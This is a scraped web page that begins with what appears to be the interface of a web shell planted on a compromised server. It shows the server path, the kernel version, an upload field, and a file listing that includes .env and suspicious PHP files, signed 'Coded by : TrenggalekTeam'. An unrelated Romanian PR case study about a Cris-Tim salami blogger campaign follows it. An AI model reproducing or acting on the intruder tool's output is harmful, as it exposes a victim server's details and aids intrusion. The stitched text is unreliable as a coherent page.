/home/dimp0083/public_html/
Linux bloomcom.designyourfuture.ro 2.6.32-673.26.1.lve1.4.22.el6.x86_64 #1 SMP Fri Feb 24 08:35:09 EST 2017 x86_64
Upload File :

Name
Size
Permissions
Options
.well-known
--
drwxr-xr-x
_old_website
--
drwxr-xr-x
app
--
drwxr-xr-x
bootstrap
--
drwxrwxr-x
config
--
drwxr-xr-x
database
--
drwxr-xr-x
public
--
drwxr-xr-x
resources
--
drwxr-xr-x
storage
--
drwxrwxr-x
tests
--
drwxr-xr-x
vendor
--
drwxr-xr-x
.env
0.485 KB
-rw-r--r--
.env.example
0.515 KB
-rw-r--r--
.gitattributes
0.06 KB
-rw-r--r--
.gitignore
0.109 KB
-rw-r--r--
.htaccess
0.149 KB
-r--r--r--
.user.ini
0.534 KB
-rw-r--r--
app.css
47.012 KB
-rw-r--r--
app.css.map
68.73 KB
-rw-r--r--
artisan
1.607 KB
-rw-r--r--
asw.php
12.639 KB
-rw-r--r--
bdb532
3.482 KB
-rw-r--r--
ceshi.html
0 KB
-rw-r--r--
composer.json
1.726 KB
-rw-r--r--
composer.lock
144.127 KB
-rw-r--r--
database.sqlite
0 KB
-rw-r--r--
error_log
70.873 KB
-rw-r--r--
gulpfile.js
1.808 KB
-rw-r--r--
index.php
46.845 KB
-rw-r--r--
package.json
0.214 KB
-rw-r--r--
php.ini
0.534 KB
-rw-r--r--
phpunit.xml
1.002 KB
-rw-r--r--
pulang.txt
0.206 KB
-rw-r--r--
readme.md
1.899 KB
-rw-r--r--
robots.txt
0.022 KB
-rw-r--r--
server.php
0.554 KB
-rw-r--r--
sitemaps.xml
2.24 KB
-rw-r--r--
wp-config-sample.php
8.293 KB
-rw-r--r--
yve.php
0.294 KB
-rw-r--r--
Coded by : TrenggalekTeam
Cris-Tim - Campanie pentru schimbarea identitatii vizuale a Salamului Sasesc

Cris-Tim - Campanie pentru schimbarea identitatii vizuale a Salamului Sasesc

Obiectiv: Obiectivul nostru principal a fost sustinerea campaniei de schimbare a identitatii vizuale pentru salamul Sasesc de la Cris-Tim si, in acelasi timp, cresterea vizibilitatii produsului in piata prin amplificarea campaniei de teasing si revealing desfasurata in media clasica.

Tactici: Pentru a ne atinge obiectivele, am creat o campanie de PR in colaborare cu unii dintre cei mai cunoscuti bloggeri culinari.

Campania a fost structurata in 2 faze: teasing si reveal.

In faza de teasing, bloggerii si-au ales de pe site-ul www.6sasi.ro unul dintre cei 6 sasi, care pastreaza secretul retetei salamului atat de popular, si l-au sustinut prin articole pe blog si in Social Media, argumentand motivul alegerii sale. Articolele au fost de tipul „Leapsa”, fiecare blogger a provocat pe unul dintre cei 5 bloggeri ramasi si sa-l provoace sa sustina, la randul lui, un sas priceput.

In faza de reveal, boggerii au dezvaluit campania, noul ambalaj al salamului si au povestit fiecare despre prima experienta pe care au avut-o atunci cand au degustat Salamul Sasesc. Articolele au fost de tip concurs, fiecare blogger provocandu-si cititorii sa isi spuna povestea proprie, astfel avand posibilitatea sa castige un premiu.



Semnatura